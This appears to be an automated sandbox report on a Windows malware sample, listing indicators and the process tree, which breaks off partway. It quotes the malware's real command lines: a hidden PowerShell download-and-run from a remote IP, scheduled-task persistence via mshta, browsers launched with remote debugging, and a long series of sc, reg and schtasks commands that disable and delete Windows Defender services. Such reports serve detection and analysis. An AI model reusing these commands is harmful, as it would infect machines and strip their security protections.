5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
5392	chrome.exe
1840	msedge.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4972	f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe
4972	f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe
4972	f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4972 wrote to memory of 232	4972	f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe	85
PID 4972 wrote to memory of 232	4972	f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe	85
PID 4972 wrote to memory of 232	4972	f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe	85
PID 4972 wrote to memory of 220	4972	f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe	86
PID 4972 wrote to memory of 220	4972	f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe	86
PID 4972 wrote to memory of 220	4972	f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe	86
PID 232 wrote to memory of 672	232	cmd.exe	88
PID 232 wrote to memory of 672	232	cmd.exe	88
PID 232 wrote to memory of 672	232	cmd.exe	88
PID 220 wrote to memory of 6036	220	mshta.exe	90
PID 220 wrote to memory of 6036	220	mshta.exe	90
PID 220 wrote to memory of 6036	220	mshta.exe	90
PID 6036 wrote to memory of 760	6036	powershell.exe	98
PID 6036 wrote to memory of 760	6036	powershell.exe	98
PID 6036 wrote to memory of 760	6036	powershell.exe	98
PID 760 wrote to memory of 764	760	TempXKJWOE0HYNCQGVNBNFYZ2LYBI0P2HZYG.EXE	99
PID 760 wrote to memory of 764	760	TempXKJWOE0HYNCQGVNBNFYZ2LYBI0P2HZYG.EXE	99
PID 760 wrote to memory of 764	760	TempXKJWOE0HYNCQGVNBNFYZ2LYBI0P2HZYG.EXE	99
PID 764 wrote to memory of 2260	764	rapes.exe	103
PID 764 wrote to memory of 2260	764	rapes.exe	103
PID 2260 wrote to memory of 3800	2260	q4jfn3p.exe	105
PID 2260 wrote to memory of 3800	2260	q4jfn3p.exe	105
PID 2260 wrote to memory of 3800	2260	q4jfn3p.exe	105
PID 2260 wrote to memory of 3800	2260	q4jfn3p.exe	105
PID 2260 wrote to memory of 3800	2260	q4jfn3p.exe	105
PID 2260 wrote to memory of 3800	2260	q4jfn3p.exe	105
PID 2260 wrote to memory of 3800	2260	q4jfn3p.exe	105
PID 2260 wrote to memory of 3800	2260	q4jfn3p.exe	105
PID 2260 wrote to memory of 3800	2260	q4jfn3p.exe	105
PID 2260 wrote to memory of 3800	2260	q4jfn3p.exe	105
PID 2260 wrote to memory of 3800	2260	q4jfn3p.exe	105
PID 2260 wrote to memory of 3800	2260	q4jfn3p.exe	105
PID 764 wrote to memory of 1720	764	rapes.exe	106
PID 764 wrote to memory of 1720	764	rapes.exe	106
PID 764 wrote to memory of 1720	764	rapes.exe	106
PID 1720 wrote to memory of 5600	1720	apple.exe	107
PID 1720 wrote to memory of 5600	1720	apple.exe	107
PID 1720 wrote to memory of 5600	1720	apple.exe	107
PID 5600 wrote to memory of 5192	5600	22.exe	109
PID 5600 wrote to memory of 5192	5600	22.exe	109
PID 5192 wrote to memory of 5148	5192	cmd.exe	111
PID 5192 wrote to memory of 5148	5192	cmd.exe	111
PID 5192 wrote to memory of 5148	5192	cmd.exe	111
PID 5148 wrote to memory of 3156	5148	22.exe	112
PID 5148 wrote to memory of 3156	5148	22.exe	112
PID 3156 wrote to memory of 3420	3156	cmd.exe	114
PID 3156 wrote to memory of 3420	3156	cmd.exe	114
PID 3156 wrote to memory of 420	3156	cmd.exe	115
PID 3156 wrote to memory of 420	3156	cmd.exe	115
PID 3156 wrote to memory of 2204	3156	cmd.exe	116
PID 3156 wrote to memory of 2204	3156	cmd.exe	116
PID 3156 wrote to memory of 5408	3156	cmd.exe	117
PID 3156 wrote to memory of 5408	3156	cmd.exe	117
PID 3156 wrote to memory of 5924	3156	cmd.exe	118
PID 3156 wrote to memory of 5924	3156	cmd.exe	118
PID 3156 wrote to memory of 5496	3156	cmd.exe	119
PID 3156 wrote to memory of 5496	3156	cmd.exe	119
PID 3156 wrote to memory of 224	3156	cmd.exe	120
PID 3156 wrote to memory of 224	3156	cmd.exe	120
PID 3156 wrote to memory of 5980	3156	cmd.exe	121
PID 3156 wrote to memory of 5980	3156	cmd.exe	121
PID 3156 wrote to memory of 2832	3156	cmd.exe	122
PID 3156 wrote to memory of 2832	3156	cmd.exe	122
PID 3156 wrote to memory of 4216	3156	cmd.exe	123

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe
"C:\Users\Admin\AppData\Local\Temp\f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4972
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn HyTTJmavQi1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\rPcI4or2p.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:232
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn HyTTJmavQi1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\rPcI4or2p.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:672
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\rPcI4or2p.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:220
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XKJWOE0HYNCQGVNBNFYZ2LYBI0P2HZYG.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:6036
  - - C:\Users\Admin\AppData\Local\TempXKJWOE0HYNCQGVNBNFYZ2LYBI0P2HZYG.EXE
      "C:\Users\Admin\AppData\Local\TempXKJWOE0HYNCQGVNBNFYZ2LYBI0P2HZYG.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:760
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:764
      - C:\Users\Admin\AppData\Local\Temp\10347640101\q4jfn3p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10347640101\q4jfn3p.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2260
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:3800
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:5392
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc7844dcf8,0x7ffc7844dd04,0x7ffc7844dd10
        9⤵
        
        PID:4452
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1888,i,668228885571882983,12206382548194158225,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1884 /prefetch:2
        9⤵
        
        PID:5056
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2224,i,668228885571882983,12206382548194158225,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2268 /prefetch:3
        9⤵
        
        PID:4476
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2360,i,668228885571882983,12206382548194158225,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2476 /prefetch:8
        9⤵
        
        PID:540
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3220,i,668228885571882983,12206382548194158225,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3292 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:4396
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,668228885571882983,12206382548194158225,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3312 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:5348
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4240,i,668228885571882983,12206382548194158225,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4296 /prefetch:2
        9⤵
        Uses browser remote debugging
        
        PID:4792
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4592,i,668228885571882983,12206382548194158225,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4700 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:700
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5296,i,668228885571882983,12206382548194158225,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5308 /prefetch:8
        9⤵
        
        PID:5864
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5464,i,668228885571882983,12206382548194158225,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5508 /prefetch:8
        9⤵
        
        PID:224
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5568,i,668228885571882983,12206382548194158225,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5548 /prefetch:8
        9⤵
        
        PID:232
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5328,i,668228885571882983,12206382548194158225,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5544 /prefetch:8
        9⤵
        
        PID:1204
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5508,i,668228885571882983,12206382548194158225,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5348 /prefetch:8
        9⤵
        
        PID:5080
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5540,i,668228885571882983,12206382548194158225,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5696 /prefetch:8
        9⤵
        
        PID:848
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:1840
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7ffc7842f208,0x7ffc7842f214,0x7ffc7842f220
        9⤵
        
        PID:5908
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1852,i,3705649679221492758,14621099450121870878,262144 --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:3
        9⤵
        
        PID:2948
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2220,i,3705649679221492758,14621099450121870878,262144 --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:8
        9⤵
        
        PID:1408
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2164,i,3705649679221492758,14621099450121870878,262144 --variations-seed-version --mojo-platform-channel-handle=1256 /prefetch:2
        9⤵
        
        PID:2300
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3484,i,3705649679221492758,14621099450121870878,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:5628
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3492,i,3705649679221492758,14621099450121870878,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:5712
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\l68gd" & exit
        8⤵
        
        PID:336
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        9⤵
        Delays execution with timeout.exe
        
        PID:5428
      - C:\Users\Admin\AppData\Local\Temp\10351780101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10351780101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1720
        
        C:\Users\Admin\AppData\Local\Temp\22.exe
        
        "C:\Users\Admin\AppData\Local\Temp\22.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5600
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D503.tmp\D504.tmp\D505.bat C:\Users\Admin\AppData\Local\Temp\22.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:5192
        
        C:\Users\Admin\AppData\Local\Temp\22.exe
        
        "C:\Users\Admin\AppData\Local\Temp\22.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5148
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D60D.tmp\D60E.tmp\D60F.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"
        10⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:3156
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:3420
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:420
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:2204
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:5408
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:5924
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5496
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:224
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:5980
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:2832
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:4216
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:2112
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:1488
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:2720
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:4344
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:5488
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:5968
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:3712
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:4856
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:3616
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:1920
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:2564
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:228
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:5464
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:3556
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:5420
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:1204
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:1420
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:548
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:5080
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:3060
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:2704
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:964
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:3264
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:2356
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:3260
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:3216
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:3748
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:3348
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:924
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:3880
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:1988
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:1004
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:1800
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:1068
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:4464
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:5900
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:1872
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:3956
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:4312
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:4180
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:376
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:4688
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:4468
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:6036
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:848
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:5932
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:5544
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:5196
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:3496
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:4732
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:5976
      - C:\Users\Admin\AppData\Local\Temp\10352530101\amnew.exe
        
